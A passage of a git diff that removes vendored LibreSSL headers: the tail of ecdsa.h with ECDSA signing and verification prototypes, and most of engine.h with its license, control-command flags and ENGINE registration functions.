- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
- *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
- *                   see ECDSA_sign_setup
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_do_sign_ex(const unsigned char *dgst, int dgstlen,
-    const BIGNUM *kinv, const BIGNUM *rp, EC_KEY *eckey);
-
-/** Verifies that the supplied signature is a valid ECDSA
- *  signature of the supplied hash value using the supplied public key.
- *  \param  dgst      pointer to the hash value
- *  \param  dgst_len  length of the hash value
- *  \param  sig       ECDSA_SIG structure
- *  \param  eckey     EC_KEY object containing a public EC key
- *  \return 1 if the signature is valid, 0 if the signature is invalid
- *          and -1 on error
- */
-int ECDSA_do_verify(const unsigned char *dgst, int dgst_len,
-    const ECDSA_SIG *sig, EC_KEY* eckey);
-
-const ECDSA_METHOD *ECDSA_OpenSSL(void);
-
-/** Sets the default ECDSA method
- *  \param  meth  new default ECDSA_METHOD
- */
-void ECDSA_set_default_method(const ECDSA_METHOD *meth);
-
-/** Returns the default ECDSA method
- *  \return pointer to ECDSA_METHOD structure containing the default method
- */
-const ECDSA_METHOD *ECDSA_get_default_method(void);
-
-/** Sets method to be used for the ECDSA operations
- *  \param  eckey  EC_KEY object
- *  \param  meth   new method
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_set_method(EC_KEY *eckey, const ECDSA_METHOD *meth);
-
-/** Returns the maximum length of the DER encoded signature
- *  \param  eckey  EC_KEY object
- *  \return numbers of bytes required for the DER encoded signature
- */
-int ECDSA_size(const EC_KEY *eckey);
-
-/** Precompute parts of the signing operation
- *  \param  eckey  EC_KEY object containing a private EC key
- *  \param  ctx    BN_CTX object (optional)
- *  \param  kinv   BIGNUM pointer for the inverse of k
- *  \param  rp     BIGNUM pointer for x coordinate of k * generator
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign_setup(EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv,
-    BIGNUM **rp);
-
-/** Computes ECDSA signature of a given hash value using the supplied
- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  sig      memory for the DER encoded created signature
- *  \param  siglen   pointer to the length of the returned signature
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign(int type, const unsigned char *dgst, int dgstlen,
-    unsigned char *sig, unsigned int *siglen, EC_KEY *eckey);
-
-
-/** Computes ECDSA signature of a given hash value using the supplied
- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  sig      buffer to hold the DER encoded signature
- *  \param  siglen   pointer to the length of the returned signature
- *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
- *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
- *                   see ECDSA_sign_setup
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign_ex(int type, const unsigned char *dgst, int dgstlen,
-    unsigned char *sig, unsigned int *siglen, const BIGNUM *kinv,
-    const BIGNUM *rp, EC_KEY *eckey);
-
-/** Verifies that the given signature is valid ECDSA signature
- *  of the supplied hash value using the specified public key.
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value
- *  \param  dgstlen  length of the hash value
- *  \param  sig      pointer to the DER encoded signature
- *  \param  siglen   length of the DER encoded signature
- *  \param  eckey    EC_KEY object containing a public EC key
- *  \return 1 if the signature is valid, 0 if the signature is invalid
- *          and -1 on error
- */
-int ECDSA_verify(int type, const unsigned char *dgst, int dgstlen,
-    const unsigned char *sig, int siglen, EC_KEY *eckey);
-
-/* the standard ex_data functions */
-int ECDSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int ECDSA_set_ex_data(EC_KEY *d, int idx, void *arg);
-void *ECDSA_get_ex_data(EC_KEY *d, int idx);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ECDSA_strings(void);
-
-/* Error codes for the ECDSA functions. */
-
-/* Function codes. */
-#define ECDSA_F_ECDSA_CHECK				 104
-#define ECDSA_F_ECDSA_DATA_NEW_METHOD			 100
-#define ECDSA_F_ECDSA_DO_SIGN				 101
-#define ECDSA_F_ECDSA_DO_VERIFY				 102
-#define ECDSA_F_ECDSA_SIGN_SETUP			 103
-
-/* Reason codes. */
-#define ECDSA_R_BAD_SIGNATURE				 100
-#define ECDSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 101
-#define ECDSA_R_ERR_EC_LIB				 102
-#define ECDSA_R_MISSING_PARAMETERS			 103
-#define ECDSA_R_NEED_NEW_SETUP_VALUES			 106
-#define ECDSA_R_NON_FIPS_METHOD				 107
-#define ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED		 104
-#define ECDSA_R_SIGNATURE_MALLOC_FAILED			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/engine.h b/thirdparty/libressl/include/openssl/engine.h
deleted file mode 100644
index 30d1bde..0000000
--- a/thirdparty/libressl/include/openssl/engine.h
+++ /dev/null
@@ -1,807 +0,0 @@
-/* $OpenBSD: engine.h,v 1.31 2015/07/19 22:34:27 doug Exp $ */
-/* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_ENGINE_H
-#define HEADER_ENGINE_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ENGINE
-#error ENGINE is disabled.
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-#ifndef OPENSSL_NO_ECDH
-#include <openssl/ecdh.h>
-#endif
-#ifndef OPENSSL_NO_ECDSA
-#include <openssl/ecdsa.h>
-#endif
-#include <openssl/ui.h>
-#include <openssl/err.h>
-#endif
-
-#include <openssl/ossl_typ.h>
-
-#include <openssl/x509.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These flags are used to control combinations of algorithm (methods)
- * by bitwise "OR"ing. */
-#define ENGINE_METHOD_RSA		(unsigned int)0x0001
-#define ENGINE_METHOD_DSA		(unsigned int)0x0002
-#define ENGINE_METHOD_DH		(unsigned int)0x0004
-#define ENGINE_METHOD_RAND		(unsigned int)0x0008
-#define ENGINE_METHOD_ECDH		(unsigned int)0x0010
-#define ENGINE_METHOD_ECDSA		(unsigned int)0x0020
-#define ENGINE_METHOD_CIPHERS		(unsigned int)0x0040
-#define ENGINE_METHOD_DIGESTS		(unsigned int)0x0080
-#define ENGINE_METHOD_STORE		(unsigned int)0x0100
-#define ENGINE_METHOD_PKEY_METHS	(unsigned int)0x0200
-#define ENGINE_METHOD_PKEY_ASN1_METHS	(unsigned int)0x0400
-/* Obvious all-or-nothing cases. */
-#define ENGINE_METHOD_ALL		(unsigned int)0xFFFF
-#define ENGINE_METHOD_NONE		(unsigned int)0x0000
-
-/* This(ese) flag(s) controls behaviour of the ENGINE_TABLE mechanism used
- * internally to control registration of ENGINE implementations, and can be set
- * by ENGINE_set_table_flags(). The "NOINIT" flag prevents attempts to
- * initialise registered ENGINEs if they are not already initialised. */
-#define ENGINE_TABLE_FLAG_NOINIT	(unsigned int)0x0001
-
-/* ENGINE flags that can be set by ENGINE_set_flags(). */
-/* #define ENGINE_FLAGS_MALLOCED	0x0001 */ /* Not used */
-
-/* This flag is for ENGINEs that wish to handle the various 'CMD'-related
- * control commands on their own. Without this flag, ENGINE_ctrl() handles these
- * control commands on behalf of the ENGINE using their "cmd_defns" data. */
-#define ENGINE_FLAGS_MANUAL_CMD_CTRL	(int)0x0002
-
-/* This flag is for ENGINEs who return new duplicate structures when found via
- * "ENGINE_by_id()". When an ENGINE must store state (eg. if ENGINE_ctrl()
- * commands are called in sequence as part of some stateful process like
- * key-generation setup and execution), it can set this flag - then each attempt
- * to obtain the ENGINE will result in it being copied into a new structure.
- * Normally, ENGINEs don't declare this flag so ENGINE_by_id() just increments
- * the existing ENGINE's structural reference count. */
-#define ENGINE_FLAGS_BY_ID_COPY		(int)0x0004
-
-/* This flag if for an ENGINE that does not want its methods registered as
- * part of ENGINE_register_all_complete() for example if the methods are
- * not usable as default methods.
- */
-
-#define ENGINE_FLAGS_NO_REGISTER_ALL	(int)0x0008
-
-/* ENGINEs can support their own command types, and these flags are used in
- * ENGINE_CTRL_GET_CMD_FLAGS to indicate to the caller what kind of input each
- * command expects. Currently only numeric and string input is supported. If a
- * control command supports none of the _NUMERIC, _STRING, or _NO_INPUT options,
- * then it is regarded as an "internal" control command - and not for use in
- * config setting situations. As such, they're not available to the
- * ENGINE_ctrl_cmd_string() function, only raw ENGINE_ctrl() access. Changes to
- * this list of 'command types' should be reflected carefully in
- * ENGINE_cmd_is_executable() and ENGINE_ctrl_cmd_string(). */
-
-/* accepts a 'long' input value (3rd parameter to ENGINE_ctrl) */
-#define ENGINE_CMD_FLAG_NUMERIC		(unsigned int)0x0001
-/* accepts string input (cast from 'void*' to 'const char *', 4th parameter to
- * ENGINE_ctrl) */
-#define ENGINE_CMD_FLAG_STRING		(unsigned int)0x0002
-/* Indicates that the control command takes *no* input. Ie. the control command
- * is unparameterised. */
-#define ENGINE_CMD_FLAG_NO_INPUT	(unsigned int)0x0004
-/* Indicates that the control command is internal. This control command won't
- * be shown in any output, and is only usable through the ENGINE_ctrl_cmd()
- * function. */
-#define ENGINE_CMD_FLAG_INTERNAL	(unsigned int)0x0008
-
-/* NB: These 3 control commands are deprecated and should not be used. ENGINEs
- * relying on these commands should compile conditional support for
- * compatibility (eg. if these symbols are defined) but should also migrate the
- * same functionality to their own ENGINE-specific control functions that can be
- * "discovered" by calling applications. The fact these control commands
- * wouldn't be "executable" (ie. usable by text-based config) doesn't change the
- * fact that application code can find and use them without requiring per-ENGINE
- * hacking. */
-
-/* These flags are used to tell the ctrl function what should be done.
- * All command numbers are shared between all engines, even if some don't
- * make sense to some engines.  In such a case, they do nothing but return
- * the error ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED. */
-#define ENGINE_CTRL_SET_LOGSTREAM		1
-#define ENGINE_CTRL_SET_PASSWORD_CALLBACK	2
-#define ENGINE_CTRL_HUP				3 /* Close and reinitialise any
-						     handles/connections etc. */
-#define ENGINE_CTRL_SET_USER_INTERFACE          4 /* Alternative to callback */
-#define ENGINE_CTRL_SET_CALLBACK_DATA           5 /* User-specific data, used
-						     when calling the password
-						     callback and the user
-						     interface */
-#define ENGINE_CTRL_LOAD_CONFIGURATION		6 /* Load a configuration, given
-						     a string that represents a
-						     file name or so */
-#define ENGINE_CTRL_LOAD_SECTION		7 /* Load data from a given
-						     section in the already loaded
-						     configuration */
-
-/* These control commands allow an application to deal with an arbitrary engine
- * in a dynamic way. Warn: Negative return values indicate errors FOR THESE
- * COMMANDS because zero is used to indicate 'end-of-list'. Other commands,
- * including ENGINE-specific command types, return zero for an error.
- *
- * An ENGINE can choose to implement these ctrl functions, and can internally
- * manage things however it chooses - it does so by setting the
- * ENGINE_FLAGS_MANUAL_CMD_CTRL flag (using ENGINE_set_flags()). Otherwise the
- * ENGINE_ctrl() code handles this on the ENGINE's behalf using the cmd_defns
- * data (set using ENGINE_set_cmd_defns()). This means an ENGINE's ctrl()
- * handler need only implement its own commands - the above "meta" commands will
- * be taken care of. */
-
-/* Returns non-zero if the supplied ENGINE has a ctrl() handler. If "not", then
- * all the remaining control commands will return failure, so it is worth
- * checking this first if the caller is trying to "discover" the engine's
- * capabilities and doesn't want errors generated unnecessarily. */
-#define ENGINE_CTRL_HAS_CTRL_FUNCTION		10
-/* Returns a positive command number for the first command supported by the
- * engine. Returns zero if no ctrl commands are supported. */
-#define ENGINE_CTRL_GET_FIRST_CMD_TYPE		11
-/* The 'long' argument specifies a command implemented by the engine, and the
- * return value is the next command supported, or zero if there are no more. */
-#define ENGINE_CTRL_GET_NEXT_CMD_TYPE		12
-/* The 'void*' argument is a command name (cast from 'const char *'), and the
- * return value is the command that corresponds to it. */
-#define ENGINE_CTRL_GET_CMD_FROM_NAME		13
-/* The next two allow a command to be converted into its corresponding string
- * form. In each case, the 'long' argument supplies the command. In the NAME_LEN
- * case, the return value is the length of the command name (not counting a
- * trailing EOL). In the NAME case, the 'void*' argument must be a string buffer
- * large enough, and it will be populated with the name of the command (WITH a
- * trailing EOL). */
-#define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD	14
-#define ENGINE_CTRL_GET_NAME_FROM_CMD		15
-/* The next two are similar but give a "short description" of a command. */
-#define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD	16
-#define ENGINE_CTRL_GET_DESC_FROM_CMD		17
-/* With this command, the return value is the OR'd combination of
- * ENGINE_CMD_FLAG_*** values that indicate what kind of input a given
- * engine-specific ctrl command expects. */
-#define ENGINE_CTRL_GET_CMD_FLAGS		18
-
-/* ENGINE implementations should start the numbering of their own control
- * commands from this value. (ie. ENGINE_CMD_BASE, ENGINE_CMD_BASE + 1, etc). */
-#define ENGINE_CMD_BASE				200
-
-/* If an ENGINE supports its own specific control commands and wishes the
- * framework to handle the above 'ENGINE_CMD_***'-manipulation commands on its
- * behalf, it should supply a null-terminated array of ENGINE_CMD_DEFN entries
- * to ENGINE_set_cmd_defns(). It should also implement a ctrl() handler that
- * supports the stated commands (ie. the "cmd_num" entries as described by the
- * array). NB: The array must be ordered in increasing order of cmd_num.
- * "null-terminated" means that the last ENGINE_CMD_DEFN element has cmd_num set
- * to zero and/or cmd_name set to NULL. */
-typedef struct ENGINE_CMD_DEFN_st {
-	unsigned int cmd_num; /* The command number */
-	const char *cmd_name; /* The command name itself */
-	const char *cmd_desc; /* A short description of the command */
-	unsigned int cmd_flags; /* The input the command expects */
-} ENGINE_CMD_DEFN;
-
-/* Generic function pointer */
-typedef int (*ENGINE_GEN_FUNC_PTR)(void);
-/* Generic function pointer taking no arguments */
-typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
-/* Specific control function pointer */
-typedef int (*ENGINE_CTRL_FUNC_PTR)(ENGINE *, int, long, void *,
-    void (*f)(void));
-/* Generic load_key function pointer */
-typedef EVP_PKEY * (*ENGINE_LOAD_KEY_PTR)(ENGINE *, const char *,
-    UI_METHOD *ui_method, void *callback_data);
-typedef int (*ENGINE_SSL_CLIENT_CERT_PTR)(ENGINE *, SSL *ssl,
-    STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **pkey,
-    STACK_OF(X509) **pother, UI_METHOD *ui_method, void *callback_data);
-
-/* These callback types are for an ENGINE's handler for cipher and digest logic.
- * These handlers have these prototypes;
- *   int foo(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid);
- *   int foo(ENGINE *e, const EVP_MD **digest, const int **nids, int nid);
- * Looking at how to implement these handlers in the case of cipher support, if
- * the framework wants the EVP_CIPHER for 'nid', it will call;
- *   foo(e, &p_evp_cipher, NULL, nid);    (return zero for failure)
- * If the framework wants a list of supported 'nid's, it will call;
- *   foo(e, NULL, &p_nids, 0); (returns number of 'nids' or -1 for error)
- */
-/* Returns to a pointer to the array of supported cipher 'nid's. If the second
- * parameter is non-NULL it is set to the size of the returned array. */
-typedef int (*ENGINE_CIPHERS_PTR)(ENGINE *, const EVP_CIPHER **,
-    const int **, int);
-typedef int (*ENGINE_DIGESTS_PTR)(ENGINE *, const EVP_MD **, const int **, int);
-typedef int (*ENGINE_PKEY_METHS_PTR)(ENGINE *, EVP_PKEY_METHOD **,
-    const int **, int);
-typedef int (*ENGINE_PKEY_ASN1_METHS_PTR)(ENGINE *, EVP_PKEY_ASN1_METHOD **,
-    const int **, int);
-
-/* STRUCTURE functions ... all of these functions deal with pointers to ENGINE
- * structures where the pointers have a "structural reference". This means that
- * their reference is to allowed access to the structure but it does not imply
- * that the structure is functional. To simply increment or decrement the
- * structural reference count, use ENGINE_by_id and ENGINE_free. NB: This is not
- * required when iterating using ENGINE_get_next as it will automatically
- * decrement the structural reference count of the "current" ENGINE and
- * increment the structural reference count of the ENGINE it returns (unless it
- * is NULL). */
-
-/* Get the first/last "ENGINE" type available. */
-ENGINE *ENGINE_get_first(void);
-ENGINE *ENGINE_get_last(void);
-/* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */
-ENGINE *ENGINE_get_next(ENGINE *e);
-ENGINE *ENGINE_get_prev(ENGINE *e);
-/* Add another "ENGINE" type into the array. */
-int ENGINE_add(ENGINE *e);
-/* Remove an existing "ENGINE" type from the array. */
-int ENGINE_remove(ENGINE *e);
-/* Retrieve an engine from the list by its unique "id" value. */
-ENGINE *ENGINE_by_id(const char *id);
-/* Add all the built-in engines. */
-void ENGINE_load_openssl(void);
-void ENGINE_load_dynamic(void);
-#ifndef OPENSSL_NO_STATIC_ENGINE
-void ENGINE_load_padlock(void);
-#endif
-void ENGINE_load_builtin_engines(void);
-
-/* Get and set global flags (ENGINE_TABLE_FLAG_***) for the implementation
- * "registry" handling. */
-unsigned int ENGINE_get_table_flags(void);
-void ENGINE_set_table_flags(unsigned int flags);
-
-/* Manage registration of ENGINEs per "table". For each type, there are 3
- * functions;
- *   ENGINE_register_***(e) - registers the implementation from 'e' (if it has one)
- *   ENGINE_unregister_***(e) - unregister the implementation from 'e'
- *   ENGINE_register_all_***() - call ENGINE_register_***() for each 'e' in the list
- * Cleanup is automatically registered from each table when required, so
- * ENGINE_cleanup() will reverse any "register" operations. */
-
-int ENGINE_register_RSA(ENGINE *e);
-void ENGINE_unregister_RSA(ENGINE *e);
-void ENGINE_register_all_RSA(void);
-
-int ENGINE_register_DSA(ENGINE *e);
-void ENGINE_unregister_DSA(ENGINE *e);
-void ENGINE_register_all_DSA(void);
-
-int ENGINE_register_ECDH(ENGINE *e);
-void ENGINE_unregister_ECDH(ENGINE *e);
-void ENGINE_register_all_ECDH(void);
-
-int ENGINE_register_ECDSA(ENGINE *e);
-void ENGINE_unregister_ECDSA(ENGINE *e);
-void ENGINE_register_all_ECDSA(void);
-
-int ENGINE_register_DH(ENGINE *e);
-void ENGINE_unregister_DH(ENGINE *e);
-void ENGINE_register_all_DH(void);
-
-int ENGINE_register_RAND(ENGINE *e);
-void ENGINE_unregister_RAND(ENGINE *e);
-void ENGINE_register_all_RAND(void);
-
-int ENGINE_register_STORE(ENGINE *e);
-void ENGINE_unregister_STORE(ENGINE *e);
-void ENGINE_register_all_STORE(void);
-
-int ENGINE_register_ciphers(ENGINE *e);
-void ENGINE_unregister_ciphers(ENGINE *e);
-void ENGINE_register_all_ciphers(void);
-
-int ENGINE_register_digests(ENGINE *e);
-void ENGINE_unregister_digests(ENGINE *e);
-void ENGINE_register_all_digests(void);
-
-int ENGINE_register_pkey_meths(ENGINE *e);
-void ENGINE_unregister_pkey_meths(ENGINE *e);
-void ENGINE_register_all_pkey_meths(void);
-
-int ENGINE_register_pkey_asn1_meths(ENGINE *e);
-void ENGINE_unregister_pkey_asn1_meths(ENGINE *e);
-void ENGINE_register_all_pkey_asn1_meths(void);
-
-/* These functions register all support from the above categories. Note, use of
- * these functions can result in static linkage of code your application may not
- * need. If you only need a subset of functionality, consider using more
- * selective initialisation. */
-int ENGINE_register_complete(ENGINE *e);
-int ENGINE_register_all_complete(void);
-
-/* Send parametrised control commands to the engine. The possibilities to send
- * down an integer, a pointer to data or a function pointer are provided. Any of
- * the parameters may or may not be NULL, depending on the command number. In
- * actuality, this function only requires a structural (rather than functional)
- * reference to an engine, but many control commands may require the engine be
- * functional. The caller should be aware of trying commands that require an
- * operational ENGINE, and only use functional references in such situations. */
-int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f)(void));
-
-/* This function tests if an ENGINE-specific command is usable as a "setting".
- * Eg. in an application's config file that gets processed through
- * ENGINE_ctrl_cmd_string(). If this returns zero, it is not available to
- * ENGINE_ctrl_cmd_string(), only ENGINE_ctrl(). */
-int ENGINE_cmd_is_executable(ENGINE *e, int cmd);
-
-/* This function works like ENGINE_ctrl() with the exception of taking a
- * command name instead of a command number, and can handle optional commands.
- * See the comment on ENGINE_ctrl_cmd_string() for an explanation on how to
- * use the cmd_name and cmd_optional. */
-int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name,
-    long i, void *p, void (*f)(void), int cmd_optional);
-
-/* This function passes a command-name and argument to an ENGINE. The cmd_name
- * is converted to a command number and the control command is called using
- * 'arg' as an argument (unless the ENGINE doesn't support such a command, in
- * which case no control command is called). The command is checked for input
- * flags, and if necessary the argument will be converted to a numeric value. If
- * cmd_optional is non-zero, then if the ENGINE doesn't support the given
- * cmd_name the return value will be success anyway. This function is intended
- * for applications to use so that users (or config files) can supply
- * engine-specific config data to the ENGINE at run-time to control behaviour of
- * specific engines. As such, it shouldn't be used for calling ENGINE_ctrl()
- * functions that return data, deal with binary data, or that are otherwise
- * supposed to be used directly through ENGINE_ctrl() in application code. Any
- * "return" data from an ENGINE_ctrl() operation in this function will be lost -
- * the return value is interpreted as failure if the return value is zero,
- * success otherwise, and this function returns a boolean value as a result. In
- * other words, vendors of 'ENGINE'-enabled devices should write ENGINE
- * implementations with parameterisations that work in this scheme, so that
- * compliant ENGINE-based applications can work consistently with the same
- * configuration for the same ENGINE-enabled devices, across applications. */
-int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg,
-    int cmd_optional);
-
-/* These functions are useful for manufacturing new ENGINE structures. They
- * don't address reference counting at all - one uses them to populate an ENGINE
- * structure with personalised implementations of things prior to using it
- * directly or adding it to the builtin ENGINE list in OpenSSL. These are also
- * here so that the ENGINE structure doesn't have to be exposed and break binary
- * compatibility! */
-ENGINE *ENGINE_new(void);
-int ENGINE_free(ENGINE *e);
-int ENGINE_up_ref(ENGINE *e);
-int ENGINE_set_id(ENGINE *e, const char *id);
-int ENGINE_set_name(ENGINE *e, const char *name);
-int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth);
-int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth);
-int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth);
-int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth);
-int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth);
-int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth);
-int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth);
-int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f);
-int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f);
-int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f);
-int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f);
-int ENGINE_set_load_privkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpriv_f);
-int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f);
-int ENGINE_set_load_ssl_client_cert_function(ENGINE *e,
-    ENGINE_SSL_CLIENT_CERT_PTR loadssl_f);
-int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f);
-int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f);
-int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f);
-int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f);
-int ENGINE_set_flags(ENGINE *e, int flags);
-int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns);
-/* These functions allow control over any per-structure ENGINE data. */
-int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg);
-void *ENGINE_get_ex_data(const ENGINE *e, int idx);
-
-/* This function cleans up anything that needs it. Eg. the ENGINE_add() function
- * automatically ensures the list cleanup function is registered to be called
- * from ENGINE_cleanup(). Similarly, all ENGINE_register_*** functions ensure
- * ENGINE_cleanup() will clean up after them. */
-void ENGINE_cleanup(void);
-
-/* These return values from within the ENGINE structure. These can be useful
- * with functional references as well as structural references - it depends
- * which you obtained. Using the result for functional purposes if you only
- * obtained a structural reference may be problematic! */
-const char *ENGINE_get_id(const ENGINE *e);
-const char *ENGINE_get_name(const ENGINE *e);
-const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e);
-const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e);
-const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e);
-const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e);
-const DH_METHOD *ENGINE_get_DH(const ENGINE *e);
-const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e);
-const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e);
-ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e);
-ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e);
-ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e);
-ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE *e);
-ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e);
-ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e);
-ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e);
-ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e);
-const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid);
-const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid);
-const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid);
-const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid);
-const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e,
